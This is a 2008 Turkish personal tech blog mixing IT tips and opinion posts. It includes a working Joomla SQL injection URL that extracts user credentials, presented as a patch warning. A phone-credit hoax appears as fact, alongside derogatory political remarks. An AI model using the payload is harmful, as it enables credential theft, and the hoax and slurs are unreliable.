Vedat FETAH Kimdir?

Ege Üniversitesi Bilgi İşlem Daire Başkanlığı bünyesinde kampüs güvenlik sistemleri yöneticisi olarak çalışma hayatıma devam ediyorum. Günlük yaşamda teknoloji ağırlıklı karşılaştığım ve beğendiğim yazıları paylaşmak amacıyla bu bloğu oluşturdum. Umarım birilerinin bilgilenmesini sağlar.

Halen Çalışmakta Olduğum Yer

Halen Ege Üniversitesi Uluslararası Bilgisayar Enstitüsü Binasında Bilgi İşlem Daire Başkanlığın'da çalışmaya devam etmekteyim.

25 Aralık 2008 Perşembe

Nice Mutlu Yıllara...


Networkçünün olabilecek en iyi çam ağacı ile nice mutlu yıllara :)

Resim kaynağı: http://www.ende-der-vernunft.org/.

15 Aralık 2008 Pazartesi

Deniz FIRAT'ı Kaybettik....


İnsan düşününce anlıyor bazı şeylerin değerini. Zamanın değerini işte o an anlıyor insan. Yitirdiklerinin aslında ne denli değerli olduğunu.

Sahip olduğumuz her varlığın yada uğruna kalp kırdığımız can yaktığımız her şeyin çoğu zaman ne kadarda anlamsız olduğunu daha bir iyi anlıyor insan.

Deniz öğretti bize dostluğun kıymetini. Otururken etrafa bakıp diğer insanları tanımayı. Birçok dostunu diğer arkadaşlarıyla paylaşarak büyük bir dostluk çemberi kurmayı öğretti.

Herkesi mutlu etmeye çalışmayı, gönül almayı, vefalı arkadaşlığı ve istemeden de olsa öğretti bu dünyada ziyaretçi olduğumuzu. O gülüşünü hiç unutmayacağız ve her zaman yanımızda olduğunu bileceğiz hayat dolu yegane dost. 12.05.1980' de doğdun 12.12.2008' de toprağa verdik.

9 Aralık 2008 Salı

The Backup Song :)


The Beatles - Yesterday şarkısının sözlerini modifiye etmişler ve ortaya böyle güzel bir sonuç çıkmış... :)

Yesterday,
All those backups seemed a waste of pay.
Now my database has gone away.
Oh I believe in yesterday.

Suddenly,
There's not half the files there used to be,
And there's a milestone hanging over me
The system crashed so suddenly.

I pushed something wrong
What it was I could not say.

Now all my data's gone
and I long for yesterday-ay-ay-ay.

Yesterday,
The need for back-ups seemed so far away.
I knew my data was all here to stay,
Now I believe in yesterday.

Kaynak: The Backup Song

Google Güvenli Web Gezintisi.


Google gün geçmiyorki yeni bir hizmetini devreye sokuyor. Bunların birçoğundan bi haberiz ancak araştırmalar yaparken karşımıza çıktıklarında haberimiz oluyor. Bunlardan bir tanesi de Google Safe Browsing. Aşağıdaki koda uygun olarak adresi girdiğinizde sayfanın bilgileri Türkçe olarak görüntülenmektedir.

Kod:

http://google.com/safebrowsing/diagnostic?site="incelemekistediğinizadres"

8 Aralık 2008 Pazartesi

Password Generator


Eğer linux kullanıyorsanız ve sürekli password üretme ihtiyacı olan bir işle ilgileniyorsanız aşağıdaki kodlar tam size göre.


# < /dev/urandom tr -dc _A-Z-a-z-0-9 | head -c8


veya;


# alias gen_pw='< /dev/urandom tr -dc _A-Z-a-z-0-9 | head -c8'
# gen_pw

7 Aralık 2008 Pazar

Finjan Güvenli Web Gezintisi Eklentisi.


İnternet güvenliğinin günümüzde ne kadar önemli olduğunu ve bu iş için kurumsal olarak ne kadar çok para harcandığını hemen hepimiz bilmekteyiz ama yine de son söz son kullanıcıda bitmektedir. Son kullanıcı her zaman kendi güvenliğini de sağlamak zorundadır. Son günlerde web sayfalarından zararlı kodlar çalıştırılarak kişisel bilgilerinizin çalınmasından bilgisayarınızın ele geçirilmesine kadar uzanan kötü sonuçlar oluşabilmektedir. Son kullanıcı olarak Finjan eklentisini firefox ve internet explorer için kurarak zararlı içerik yada istek dışı web yönlendirmelerini engellemek mümkün. Bunun için inter explorer'a kurulabilecek eklenti http://securebrowsing.finjan.com/FinjanSecureBrowsingSetup.exe adresinden, firefox için ise http://securebrowsing.finjan.com/FinjanSecureBrowsingSetup.xpi adresinden temin edilebilir. Bu eklenti kurulduktan sonra firefox tarayıcıda sağ altta Finjan logosu görüntülenir. Herhangi bir arama yaptığınız zaman güvensiz bağlantıları görebilirsiniz. Örnek olarak resimi inceleyebilirsiniz.

Günün Sözü :)

"Security just like a girl. B0th of them have some holes. You always try to find the hole, but not every time y0u can exploit it!

ProxyPac Testi.


Eğer networkünüzde belli hizmetler için proxypac (Proxy Auto Configuration) uygulmasını kullanıyorsanız bazen yeni tanımladığınız networklere erişimi test etmek isteyebilirsiniz. Bu durumda google code'da yayınlanan ufak bir uygulama imdadınıza yetişebilir. PACTESTER ile komut satırından proxypac yapılandırmanızı "offline" olarak test etmenize yardımcı olmaktadır.



Örnek yapılandırma:

 pactester -p proxy.pac -u http://www.yahoo.com -c 192.168.1.2
PROXY 192.168.0.1:8080



4 Aralık 2008 Perşembe

Google Hangi Film Hangi Sinemada....


Google yeni bir hizmet daha başlatmış. Bu hizmet türkçe ve Türkiyedeki şehirler için de hizmet veriyor. Hangi film hangi sinemada öğrenmek isterseniz http://www.google.com.tr/movies.

30 Kasım 2008 Pazar

Tekir Linux Ücretsiz Muhasebe Otomasyon Yazılımı


Bugün madem program tanıtımı ile ilgili linkler veriyoruz o zaman çoğu kişinin bilmediği bir muhasebe otomasyon yazılımı hakkında da bilgi verelim istedim. Sektördeki çoğu kişinin varlığından bihaber olduğu otomasyon yazılımı ilgili bilgilere aşağıdan ulaşabilirsiniz.

İşletmenizin başarı kazanması için alım ve satım yaptığınız müşterilerinizi düzenli olarak kaydetmeli, stoklarınızda ne kadar mal olduğunu her an bilmeli, depolarınız arasında eşgüdüm sağlamalı ve kasanızın durumu ile alacak / verecek dengenizi kontrol altına almalısınız. Tüm bunları yapabilecek bir yardımcı arıyorsanız Tekir tam size göre.

Detaylı bilgi için: Özgürlük İçin

Boncuk Linux Online/Offline Sözlük


Günümüzde yabancı dil her alanda karşımıza çıkıyor. Buna sanal ortam da dahil. Bilgisayarda gerek İnternet ortamında dolaşırken gerekse kullandığımız programlarda bilmediğimiz yabancı kelimelerle karşı karşıya kalabiliyoruz. İşte bu anda imdadımıza boncuk yetişiyor.

Boncuk çok geniş kapsamlı çevrimiçi ve çevrimdışı çalışabilen bir sözlük. internet bağlantınız varsa çevrimiçi olarak eğer o an için bağlantınız yoksa çevrimdışı olarak istediğiniz ingilizce-Türkçe kelimenin anlamını arayabilirsiniz.

Detaylı bilgi için: Özgürlük İçin

Autorun Virüsü Çözümü


Güncel bir virüs olan Win32/SmallF virüsü çoğu kullanıcının başını ağrıtmaya devam ediyor Flash bellekler yaygınlaştıkça ve kullanıldıkça bu ve benzeri virüslerle karşılaşmamız kaçınılmaz Bu konuda da flash belleklere bulaşan bu virüsden nasıl kurtulunabileceği anlatılacaktır.

Bu iş için iki geçerli yol bulunmaktadır. Birincisi elle temizleme yöntemi, ikincisi bir program yardımıyla silme işlemi ve son olarak elle registry'den temizleme işlemi.

1 Virüsü elle de silebilirsiniz Bunun için Bilgisayarım/Araçlar/ Klasör seçenekelerinden gizli dosyaları gösteri işaretleyin alt satırdan da korunan ve gizlenen işletim sistemi dosyalarını görünür hale getirin yanındaki tiki kaldırın ve çift tıkla açılmayan sürücünüze girerek autorun dosyalarını siliniz

2 İsterseniz linkdeki bat dosyasını çalıştırarak da kolayca autorun ve türevleri olan copyexesxsexebittorrentexe win32exe den kurtulabilirsiniz

http://security.ege.edu.tr/download/sil.rar

Linkteki dosyayı indirip çalıştırın işlem bitinceye kadar yaklaşık 3-5 dakika bekleyin Bilgisayar kapanıp açılacak ve virüsden kurtulacaksınız

3Bu yöntem de ise virüsü kayıt defteri vasıtasıyla siliyoruz
Başlat/Çalıştır/Regedit yazıp enterlayın

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Userinit"="userinitexe" olarak ayarlamak (autorunbat eki varsa silin Doğru ve temiz ayar C:\WINDOWS\system32\userinitexe şeklinde olacak )
ve
[HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Explorer\Advanced]
"ShowSuperHidden"=dword:1 olarak ayarlamak (00000 ise silip 1 yapın)
ayrıca
HKEY_CURRENT_USER\Software\microsoft\Windows\Curre ntVersion\Explorer\ içinde bulunan
MountPoints2 klasörünü komple içindekilerle birlikte silmek gerekiyor(merak etmeyin silin birşey olmaz)

Bu işlemleri yaparken dikkat etmeniz gereken en önemli nokta flash belleğinizinde bilgisayarınıza USB portundan bağlı olmasıdır.

26 Kasım 2008 Çarşamba

DOS / Windows IP Command Lines

Display Connection Configuration: ipconfig /all

Display DNS Cache Info Configuration: ipconfig /displaydns

Clear DNS Cache: ipconfig /flushdns

Release All IP Address Connections: ipconfig /release

Renew All IP Address Connections: ipconfig /renew

Re-Register the DNS connections: ipconfig /registerdns

Change/Modify DHCP Class ID: ipconfig /setclassid

Network Connections: control netconnections

Network Setup Wizard: netsetup.cpl

Test Connectivity: ping www.whatismyip.com

Trace IP address Route: tracert

Displays the TCP/IP protocol sessions: netstat

Display Local Route: route

Display Resolved MAC Addresses: arp

Display Name of Computer Currently on: hostname

Display DHCP Class Information: ipconfig /showclassid

25 Kasım 2008 Salı

Gmail Temalandı.


Gmail mail arayüzünde artık kullanıcılarına birçok tema arasından seçim yapabilme imkanı sağlamış bulunuyor. Çok ta güzel olmuş mesela ASCII sevenleri de pas geçmemiş google hazretleri. Yandaki resim benim hesabımın teması :)

16 Kasım 2008 Pazar

İş Ağlarında Rapidshare Bloklama


İş ağlarında genel olarak yaşanan sorunlardan birisinin gereksiz trafikler sebebiyle yüksek band genişliklerinin kullanılması olduğu bir çok sistemci tarafından bilinen bir gerçektir. Bunu önlemenin birkaç basit adımla ücretsiz bir şekilde yapılabilmesi birçok kişi tarafından bilinmemektedir. Kullanılabilecek efektif çözümlerden birisi snort yazılımı ile trafiği denetlemek olarak gösterilebilir. Yüksek band genişliği kullanımına genelde neden olan rapidshare adlı siteden dosya transferi ve P2P uygulamalarında kullanıcıların download ve upload limitlerini belirlememeleri olarak gösterilebilir. Rapidshare sitesinin engellenmesinin zorluğu birçok network ve ip adresinden dağıtımın yapılmasıdır. Bloklanan bir ip adresi diğer ip adreslerinden erişimi engellememektedir. Bu neden trafik bloklaması L7 seviyesinde firewallar ile veya imza tabanlı çalışan IDS, IPS veya son zamanlarda IDP olarak belirtilen sistemler sayesinde yapılabilmektedir. Ücretsiz olarak ağınızı dinleyebileceğiniz ve bağlantı temelli engellemeler yapabileceğiniz yazılımlardan en bilineni Snort adlı yazılımdır. Eğer siz de ağınızda snort yazılımını kullanıyorsanız rapidshare sitesine erişimleri bloklamak için aşağıdaki adresleri kullanabilirsiz. Ayrıca erişilmesini istemediğiniz web sayfalarına erişimi de url adresini değiştirerek yapabilirsiniz. Bu sayede ağınızdaki kullanıcının internetini kısıtlamadan o siteleri erişimlerini engelleyebilirsiniz.

Örnek İmzalar:

alert tcp any any -> any 80 (content:"rapidshare.de/"; msg:"Rapidshare Erisim Engellemesi"; sid:100001; rev:1; resp:rst_all;)

alert tcp any any -> any 80 (content:"http://rapidshare.de/"; msg:"Rapidshare Erisim Engellemesi2"; sid:100002; rev:1; resp:rst_all;)

alert tcp any any -> any 80 (content:"rapidshare.com/"; msg:"Rapidshare Erisim Engellemesi3"; sid:100003; rev:1; resp:rst_all;)

alert tcp any any -> any 80 (content:"http://rapidshare.com/"; msg:"Rapidshare Erisim Engellemesi4"; sid:100004; rev:1; resp:rst_all;)

14 Kasım 2008 Cuma

Joomla Component com_content 1.0.0 (ItemID) SQL Injection Vulnerability...

Yeni çıkan SQL injection açıkları nedeniyle joomla ile yapılmış sitelerin acil olarak sürüm yükseltmeleri (güncel sürüm 1.5.8) yada yamayı geçmeleri gerekmektedir.

Author : unknown_styler

Dork : inurl:com_content

POC : http://localhost/index.php?option=index.php?option=com_content&task=blogcategory&id=60&Itemid={SQL}

Example : http://localhost/index.php?option=com_content&task=blogcategory&id=60&Itemid=99999%20union%20select%201,concat_ws(0x3a,username,password),3,4,5%20from%20jos_users/*

5 Kasım 2008 Çarşamba

CNN Canlı Yayında Hologramla İnsan Işınladı...


Amerikanın olağan seçimlerinden biri yaşanırken CNN müthiş bir olaya ev sahipliği yaptı. Bu olay ise dünyada ilk kez CNN tarafından canlı yayında gerçekleştirildi. Açıkçası annesi porno resimler veren Kenya'nın ücra köylüsü Ermeni soykırımıı ile prim yapmaya çalışan bir başkanın seçilmesinin ötesinde bu olayı seyretmek için CNN'i izledim. Aralarında binlerce kilometre olmasına rağmen aynı salonda yayını sundular. Müthiş bir başarıya imza attılar da. Tabii bu olayı porno sektöründe nasıl kullanırız tartışmaları da cabası :)

4 Kasım 2008 Salı

Blogger Mesaj İçinde Html Kod Kutusu Yerleştirmek.

Eğer sizde blogger hesabına sahipseniz ve zaman zaman html yada javascript kodlarını yazmanız gerekiyorsa ne denli sorunlu bir iş olduğunu bilirsiniz. Bunun için çok basit bir yol var. Önce http://formatmysourcecode.blogspot.com/ adresini ziyaret ediyorsunuz. Burdaki kutulardan yukardakine kodunuzu olduğu gibi yapıştırıyorsunuz. Tab size değerinizi belirledikten sonra Format Text butonuna tıklıyoruz. Daha sonra alttaki kutuda şekillenmiş olan kodunuzu alıp blogger sayfanıza yapıştırıyorsunuz. Kodunuzun sayfanızda nasıl görüneceğini en alttaki kutuya bakarak anlayabilirsiniz.

Cisco Network Akademisi Eğitimleri.

Ege Üniversitesin'de, birimimize bağlı olarak yürütülen Cisco Networking Academy Programı eğitimleri yeni sezonda da başlamış bulunmaktadır. Bu hafta sonu ilk olarak hafta sonu eğitimleri başlayacaktır. Sezon boyunca farklı günlerde eğitim olanakları sunulmaya devam edecektir. Bu 4 kurluk eğitimi almak isteyenler http://cnap.ege.edu.tr linkinden geçici online başvurularını yapabilir ve daha sonra açılacak olan kurslardan birisine kesin kaydını gerçekleştirip eğitimlerine başlayabilir. Şu an için 8 Aralık tarihinde başlayacak olan 1. kur eğitimlerine kesin kayıtlar yapılmakta olup ilerleyen zamanlarda hafta içi kurs kayıtları da yapılacaktır. Kurs hakkında çok daha detaylı bilgiyi (ücretlendirme, eğitmenler, eğitim konuları vb...) http://cnap.ege.edu.tr adresinden alabilirsiniz.

Kursun 4 kurluk içeriği Türkçe olarak aşağıdaki gibidir.

Eğitim Kapsamı
2007 sonbaharından itibaren CCNA içeriği değişmiştir.
Ayrıntılı bilgi için: http://www.cisco.com/web/learning/netacad/course_catalog/newCCNA.html
Yeni yapıda CCNA, iki ayrı kategori olarak verilmeye başlanmıştır.

CCNA EXPLORATION
Kur 1- Ağ Temelleri
Kur 2- Routing (Yönlendirme) Protokolleri ve Kavramları
Kur 3- Yerel Ağlar ve Kablosuz Ağlar
Kur 4- WAN Teknolojileri
Ayrıntılı bilgi için:
http://www.cisco.com/web/learning/netacad/course_catalog/CCNAexploration.html

1.KUR : Network Temelleri
• Bir network merkezinin yaşam döngüsü
• Ağ üzerinden habeleşme
• OSI-Uygulama Katmanı görevleri ve protokolleri
• OSI-Aktarım Katmanı görevleri ve protokolleri
• OSI-Ağ Katmanı görevleri ve protokolleri
• IPv4 Network adreslemesi
• OSI-Veri Bağlantı Katmani görevleri ve protokolleri
• OSI-Fiziksel Katmanı
• Ethernet Sistemi ve çalışma mantığı
• Network Planlaması ve kablolama
• Network konfigürasyonu ve testi

2.KUR : Routing (Yönlendirme) Protokolleri ve Kavramları
• Yönlendirmeye giriş ve paket iletimi
• Statik yönlendirme
• Dinamik yönlendirme protokollerine giriş
• Distance Vector yönlendirme protokolleri
• RIP version 1
• VLSM ve CIDR
• RIP versiyon 2
• Yönlendirme tablosu oluşumu ve yapısı
• EIGRP
• Link state yönlendirme protokolleri
• OSPF

3.KUR : Yerel Ağlar ve Kablosuz Ağlar
• LAN Dizaynı
• Temel switch kavramları ve konfigürasyonu
• Virtual LAN'lar (VLAN)
• VLAN Trunking Protokolü-VTP
• Spannig Tree Prokolü-STP
• VLAN'lar arası yönlendirme
• Temel Kablosuz ağ kavramları ve konfigürasyonu

4.KUR : WAN
• WAN teknolojilerine giriş
• Point-to-Point Protokolu PPP
• Frame Relay
• Network güvenliği
• Access Contol List'ler
• Teleworker servisi ve VPN
• IP adresleme ve IPv6
• Network hata giderme

29 Ekim 2008 Çarşamba

Tepkimizi Çekmeyi Başardın Kara Memet.....


Can Dündar, 'Mustafa' filmi için Turkcell'e sponsorluk teklif etti. Turkcell de yaklaşık 350 bin euro'ya sponsor olmayı kabul etti. Ancak filmi izleyen Turkcell yöneticileri 'Bizim toplumun her kesiminden müşterimiz var. Bu filme sponsor olursak bir kesimin tepkisini çekeriz' diiyerek sponsorluktan son anda vazgeçti. Can Dündar'ın filmine Sabancı Holding sponsor oldu..

Ayakta alkışlıyorum sizi ve numaramı en kısa süre içerisinde diğer bir operatöre taşıyorum. Haklı çıktınız tepkimi çektiniz.

28 Ekim 2008 Salı

Bloger Kapatmada İş Bilmezlik...


Her işi olduğu gibi bunu da yüzümüze gözümüze bulaştırdık. Herkesin aksine yargıya tek kelime etmeyeceğim. Benim sözüm iş bilmez, beceriksiz, işin kolayına kaçıp hakkını veremeyen Telekom yöneticilerine. Adam gibi birini işe alıp bu kadar kişiyi karşınıza almasaydınız daha mantıklı olcaktır sanırım. Ayrıca açılacak zarar tazminatı davalarını karşılamaya gücünüz yetecek mi?

23 Ekim 2008 Perşembe

Saatler Geri Alınıyor...


2008'Mart ayında saatlerin bir saat ileri alınmasıyla başlayan yaz saati uygulaması bitiyor. Yaz uygulaması 26 Ekim Pazar günü saat 04.00’de bir saat geri alınacak. Yaz saati uygulamasına 30 Mart 2008 tarihinde geçilirken saatler 03.00’de bir saat ileri alınmıştı. Gün ışığından daha fazla yararlanmak için uygulamaya ilişkin Bakanlar Kurulu Kararı da 26 Mart 2008 tarihli Resmi Gazete’de yayımlanmıştı. Enerji Bakanlığı, Bakanlar Kuruluna sunmak üzere konuyla ilgili kararname teklifini hazırladı. BELKİ BU YIL SON KEZ GERİ ALINACAK Buna göre yazsaati , bir başka deyişle ’ileri saat’ uygulaması, 30 Mart Pazar günü saat 03.00’de saatlerin bir saat ileri alınmasıyla başlarken, Bakanlar Kurulu da onay verirse 26 Ekim Pazar günü saat 04.00’de saatlerin bir saat geri alınmasıyla sona erecek. Yaz saati uygulaması başlangıç ve bitim tarihlerinde, Avrupa ülkeleriyle birlikte hareket ediliyor. Yaz saati uygulamasıyla, enerji tasarrufu, AB üyesi ülkeler ile saat birlikteliği ve uyum sağlama yanında, akşam saatlerinde en yüksek değerine ulaşan enerji tüketim talebinin (puant gücünün) azaltılması amaçlanıyor. İLERİ SAATİN TÜM YILA YAYILMASI KONUSUNDA ÇALIŞILIYOR Bu arada, Enerji ve Tabii Kaynaklar Bakanlığı yetkilileri, yaz saatinin tüm yıla yayılması konusunda yapılan kanun değişikliği çalışması bu yıl TBMM’den çıkarsa, ileri-geri saat uygulamasının, geçiş süreci olarak önümüzdeki yıl da devam edeceğini, 2010 yılından itibaren ise söz konusu uygulamanın kaldırılarak Türkiye’nin aynı saat diliminde kalacağını kaydetti.

15 Ekim 2008 Çarşamba

Tebrikler Michael...


Alman ZDF Televizyonu'nda Thomas Gottschik'in sunduğu "Bahse Var mısın?" (Watten Das) adlı yarışma programına başvuran İsviçreli Michael Sauser, 188 ülkenin ulusal marşını notasıyla birlikte söyleyebileceğini iddia etti.

Yarışma isteği kabul edildi ve yarışma günü jürinin seçtiği beş bayrağın ülkelerinin ulusal marşının okunması kararlaştırıldı, seçim yapıldı ve marşları okunacak ülkeler sırayla Çin, Mısır, Tayland, Bosna-Hersek ve Türkiye olarak belirlendi.

Michael Sauser, ilk dört ülkenin marşını başarıyla okuyunca, jüri yeterli bularak yarışmayı kazandığını söyledi ve Türk Ulusal Marşı'nın okunmasına gerek olmadığını söyledi. Ancak Michael Sauser "Hayır! Madem ki Türk Bayrağı'nı da seçtiniz, Türk Ulusal Marşı'nı da söylemek istiyorum" dedi.

Israr üzerine jüri ve yapımcı kabul etmek zorunda kaldı. Orkestra hazırlandığında Michael Sauser salona dönerek "Yanlız Türk Ulusal Marşı ayakta dinlenir, kalkmanızı rica ediyorum." dedi.

Katılımcıların şaşkın davranışları, biraz sonra Michael Sauser'un ricasını yerine getirmeye dönüştü ve Michael Sauser kendi aksanıyla Türk Ulusal Marşı'nı muhteşem şekilde icra etti.

Bu vatanın ekmeğini yiyip, suyunu içen vatan hainlerinin utanması dileğiyle...


Not: Tv şov programını kaynak olarak belirtilen adresten izleyebilirsiniz.

13 Ekim 2008 Pazartesi

Google Frame Injection Hack...


Evet hepimizin güvenerek ve severek kullandığı google servislerinin açıklarını biliyormuydunuz? Pek sanmıyorum. Bu açıklar sayesinde calendar, mail ve diğer google servisleri ile ilgili şifreleriniz çalınabilir. Bu olaya sebep olan ise basit XSS açıkları. Aşağıda örnek linkler veriyorum ilgilenenler inceleyebilir. Hatta inanmıyorum diyebilir :)

s?sa=N&tab=ln Google map dizini altında haberlerin ne işi var :)
3 Bu linkle mail servisinin nasıl başka yerlere yönlendirildiğini görebilirsiniz. 

Örnekler daha da çoğaltılabilir.

12 Ekim 2008 Pazar

Flash Clickjacking!!!


İnternet ve web browser güvenlik uzmanları kullanıcıları bekleyen kötü niyetli yeni bir korsanlık türünün varlığını dile getirdiler. “Clickjaking-Tıklama korsanlığı”adı verilen bu yeni tür bilgisayar korsanlığında; kullanıcıların zararsız gibi görünen sitelerde sörf yaparken kişisel bilgilerinin “click-tıklama” yapmalarıyla birlikte kullanıcıların aldatılmasını sağlayacak bir yöntem olarak kullanıldığı belirtildi.
Clickjacking Adobe Flash Player için olduğu gibi Firefox, Internet Explorer, Opera, Safari ve yeni hizmete sunulan Google Chrome için bile bir savunmasızlık olarak tanımlandı.
Potansiyel kötü niyetli yazılımların Firefox’ta çalışmasını engelleyen NoScript eklentisinin yazılımcısı Giorgi Maone şunları söyledi: “Bu gerçekten ciddi bir sorun. Clickjacking çok basit bir saldırı biçimi ve şimdi detaylar dışarıda. Herhangi bir yazılımcı çocuk bile bunu kolayca başarabilir. Kaç tane tuzak site olduğuna dair elimizde herhangi bir tahmin yok ve bu tekniği kullanan kaç sayfa olduğuna dair güvenilir bir rapor henüz yok; çünkü bu tekniği gerçekleştirmenin sonsuz yolu var. Bu yüzden bunu otomatik olarak tespit edebilen imza tabanlı bir tarama henüz mevcut değil.”
Bilgiye izinsiz erişim
Clicjacking probleminin ciddiyeti SecTheory şirketinin CEO’su Robert Hansen ve WhiteHat Security şirketinin CTO’su Jeremiah Grossman tarafından belirtildi. Her iki yönetici bu büyük sorunu kamuoyu önünde açıklamak için geçtiğimiz ay bir konferans düzenleyeceklerdi;ancak, bu konferansı Adobe ve diğer browser şirketlerine çözüm için bir şans vermek amacıyla ertelediler.
Yapılan bu açıklamaya karşılık Adobe Salı günü bir güvenlik tavsiyesi açıkladı. Bu açıklamada belirlenen tehditin “kritik” olduğu söylendi ve kullanıcıların kamera ve mikrofonlarına izinsiz girişi engellemek için Flash programını nasıl kapatmaları gerektiği tarif edildi.
Adobe’nin güvenlik programı yöneticisi David Lenoe Adobe güvenlik blogunda şu açıklamayı yazdı: “Flash Player için hemen bir güvenlik tavsiyesi talimatı yayınladık.” Clickjacking kullanıcıların bir diyalog ya da linki kendilerini saldırya maruz bırakacak tuzaklara yönlendirdiğini bilmeden tıklamalarıyla ortaya çıkıyor. Bu potansiyel clickjacking browser sorunu, Adobe Flash Player ile mikrofon ve kamerayı erişime geçiriyor.

Hansen ve diğer araştırmacıların tekrar ederek belirttikleri gibi “Flash-clickjacking” sorunun sadece tek bir türü. Hansen’in blogunda uzun olarak açıkladığı üzere clickjacking’in birçok çeşidi var: "Bunlardan bazıları çapraz domain erişimi içerirken, bazılarıysa içermiyor. Bazıları bütün sayfaları bir sayfayla örtüyor, bazıları sizi tıklamanız için spotlar aracılığıyla kandırıyor. Kimisi JavaScript gerektirir, kimisi gerektirmez. Kimi çeşitleri önyükleme için formlarda CSRF kullanır, kimisiyse kullanmaz. Clickjacking bunlardan sadece birini sizi dolandırmak için kullanamaz, tamamını kullanır.”

Yani zararlı içerik bulunduran sitede, bilgisayarınıza istediği programı yüklemenize izin veren butonlar var ve siz bunu göremiyorsunuz. sitenin normal içeriğiyle ilgili işlem yaparken her tıkladığınızda zararlı kodlar çalışıyor ve siz farkında olmadan bu kişiler ne istiyorlarsa yüklüyorsunuz.
en sonunda da bu kişiler bilgisayarınıza bağlı web kamera ve mikrofonunuzun yakaladığı her veriye ulaşabiliyorlar.
internet güvenliği uzmanları bu soruna nihayet bir çare düşündüler. şimdi bu tehlikeden nasıl kurtulacağınızı da anlatalım.

önce bu sayfaya girin, http://www.macromedia.com/support/documentation/en/flashplayer/help/settings_manager02.html

şimdi açılan pencerede "always deny"ı seçin,
son olarak "confirm"e tıklayın.
not: eğer özel olarak kamera veya mikrofon verilerinize ulaşmasına izin vermek istediğiniz bir site varsa buradan yapabilirsiniz. http://www.macromedia.com/support/documentation/en/flashplayer/help/settings_manager06.html

Kendini bir JavaScript oyunu olarak tanımlayan uygulama içerisindeki bir objeye tıklandığında arka planda açılan IFrame ile dışarıdan Flash özelliklerine erişim sağlanabiliyor. Ayrıca tarayıcıdan javascript'i kapatmakta bir çözüm olmuyor. Benzer saldırılar Flash, DHTML, Silverlight ve Java üzerinden de yapılabiliyor. Demoda kullanılan açık için Adobe güncelleştirme yaptı. Bu nedenle demoyu isterseniz YouTube üzerinden izleyebilirsiniz.

Benzer clickjacking saldırıları çeşitli güvenlik uzmanları tarafından da araştırılmakta. Aviv Raff'ta benzer bir saldırı senaryosunu hazırladığı demo ile sunuyor. Ayrıca güvenlik uzmanları özellikle artan bu saldırılara karşı kullanıcıların dikkatli olmalarını öneriyor. Şuan güvenlik yöntemleri sınırlı da olsa Firefox'ta bulunan NoScript eklentisi ciddi bir güvenlik sağlayabiliyor. ClearClick fonksiyonu ile birlikte gizlenmiş ya da transparan kutucukların tespiti mümkün.

5 Ekim 2008 Pazar

Cepte kontör düşmanı 'aktif arama' tuzağı ve kurtuluş yolu

Aşağıdaki yazıdan bazılarınızın haberi olabilir. Daha önce e-mail ile bir süre dağıtılmıştı bu bilgi. Bilmeyenler için yeniden....

Cep telefonları ile arama yapıldığında ekranda beliren 'aktif aramalar' yazısının kontör kaybına sebep olduğu iddia edildi.

Zaman Gazetesi'nin haberine göre; Her arama sırasında ekranda beliren 'aktif aramalar' yazısı sebebiyle karşıdaki kullanıcıdan bir kontör düştüğü tespit edildi. Kamudan üst düzey bir yetkili duyum üzerine konuyla ilgili araştırma yaptığını, bilgi almak için başvurduğu cep telefonu şirketlerinin aktif arama sonrasında oluşan kontör kaybını doğruladığını söyledi. Şirketler aynı yetkiliye kontör kaybı yaşamaması için yapması gereken işlemleri de anlatmış. Cep telefonu kullanıcılarının ekranda beliren aktif arama yazısını iptal etmesi gerekiyor. Telefonda sırasıyla ##002# tuşlanarak arama yapılıyor ekranda 'Aktarma iptal edildi' yazısı beliriyor. Bu sayede gelen her aramada ekranda beliren aktif arama yazısı kaldırılıyor.

'Aktif aramalar' yazısı iptal edilmediği müddetçe, aranan kişiye ulaşamayanlardan bir kontör düşülüyor. Eğer aranan kişinin telefonu da telesekreter ayarlı ise dinlenen bir saniyelik 'aradığınız kişiye ulaşılamıyor' mesajı için de kullanıcıların ayrıca bir normal arama karşılığı ücretlendirildiği belirtiliyor. Kullanıcı, eğer iki dakika sonra yine ulaşamazsa 1,5 kontör kaybı daha oluyor. Telesekreterin ücretsiz zannedilmesi tüketicileri mağdur ediyor. Telefon şebeke istasyonu yetkilileriyse bilgi almak isteyen kullanıcılara; ##002#'yi arayarak telesekreterin kaldırılabileceğini anlatmakla yetiniyor. Aboneler "Kullandığımız telefonların bütün özelliklerini bilmiyoruz. Bizden habersiz neden bu tür uygulamalar yapılıyor." şikayetinde bulunuyor.

27 Eylül 2008 Cumartesi

Mustafa Kemal ATATÜRK Filmi


http://mustafa.com.tr/ adresinde filmin fragmanı bulunuyor. Mustafa Kemal hakkında birilerinin bişeyler yaptığını görmek çok güzel. Film 29 Ekim tarihinde gösterime girecek. O ana kadar filmin fragmanı ve diğer bilgilerin yer aldığı siteyi göz atmak için ziyaret edebilirsiniz.


24 Eylül 2008 Çarşamba

Sanal Firefox :)

Bir tarayıcı düşünün: Ekranınızdan size bakıyor ama aslında orada değil. İşte "Sanal Firefox"...

Dünyanın önde PC üreticisi Hewlett-Packard (HP), HP Compaq dc7900 isimli yeni masaüstü sistemini satışa sundu. Firefox kurulu olarak gelen, ancak gerçekte Firefox'un bulunmadığı yeni HP Compaq dc7900, sanal web tarayıcısıyla malware saldırılarına karşı da koruma altına alınmış durumda.

Virtual Firefox (Sanal Firefox) olarak da bilinen sanal web tarayıcı, HP'nin Symantec ve Mozilla firmalarıyla görüşmesi neticesinde HP sistemlerinde yer almaya başladı. Bunun ilk örneği olan Compaq dc7900, Virtual Firefox sayesinde, sisteme herhangi bir malware saldırısı gerçekleştiğinde hiçbir şekilde zarar görmeyecek.

Virtual Firefox ile PC'lerin daha stabil kullanılabilmesinin artık mümkün olduğunu dile getiren Symantec'in teknik ürün yöneticisi Scott Jones, Web'de sörf yapılırken PC üzerinde yapılan değişikliklerin artık sanal bir katmanda (virtual layer) yer alacağını sözlerine ekledi.

Sanal Firefox'un VMware ya da Virtual PC gibi uygulamalardan en önemli farkı, tüm işletim sistemi yerine sadece tarayıcının sanallaştırılıyor olması.

Kaynak: http://www.hurriyet.com.tr

Sudo Komutunu Açıklamanın En Güzel Şekli....


Linux kullanıcıları sudo komutunun normal bir kullanıcıya root hakları ile bir komutu çalıştırma fırsatı verdiğini bilir. Ama Internet’te dolaşırken gördüğüm bu resmi paylaşmadan geçemedim.

16 Eylül 2008 Salı

Pardus 2008.1 Hyaena Hyaena


Pardus 2008.1 Hyaena Hyaena sunucularda...

